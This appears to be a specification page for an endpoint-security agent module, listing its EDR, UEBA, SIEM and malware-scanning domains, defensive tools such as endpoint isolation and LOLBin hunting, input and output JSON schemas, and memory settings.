Endpoint Security
Purpose
Unified endpoint detection + user/entity behaviour analytics: process tree analysis, persistence mechanisms, memory forensics, behavioural baselines, insider-threat scoring, impossible-travel detection, and peer-group deviation.
MCP Domains
| Domain | Description |
|---|---|
ueba | User/entity behavioural baselines, anomaly scoring |
edr | Endpoint telemetry, process analysis |
siem | Log search, event correlation |
malware | YARA scanning integration |
Tools
| Tool | Description |
|---|---|
isolate_endpoint | Network isolation of endpoint |
scan_endpoint | Trigger endpoint scan |
search_logs | Query SIEM for endpoint events |
correlate_events | Cross-reference endpoint events |
hunt_lolbins | LOLBin detection on endpoints |
baseline_deviation | Detect deviation from user/entity baseline |
user_risk_score | Calculate composite user risk score |
Input schema
{
"entity_id": "string",
"endpoint_id": "string",
"analysis_type": "edr | ueba | both",
"time_range": {"start": "ISO8601", "end": "ISO8601"}
}
Output schema
{
"entity_id": "string",
"risk_score": "float",
"endpoint_id": "string",
"threat_indicators": ["string"],
"behavioral_anomalies": [
{
"type": "string",
"description": "string",
"deviation_zscore": "float"
}
],
"process_tree": {
"pid": "int",
"name": "string",
"children": []
},
"mitre_techniques": ["string"],
"recommended_response_actions": ["string"],
"investigation_timeline": [
{"timestamp": "ISO8601", "event": "string"}
]
}
Memory config
| Parameter | Value |
|---|---|
sliding_window | 40 |
enable_episodic | true |
enable_threat_intel | true |
auto_persist_interval | 15 |
Allow-list
ueba, edr, siem, malware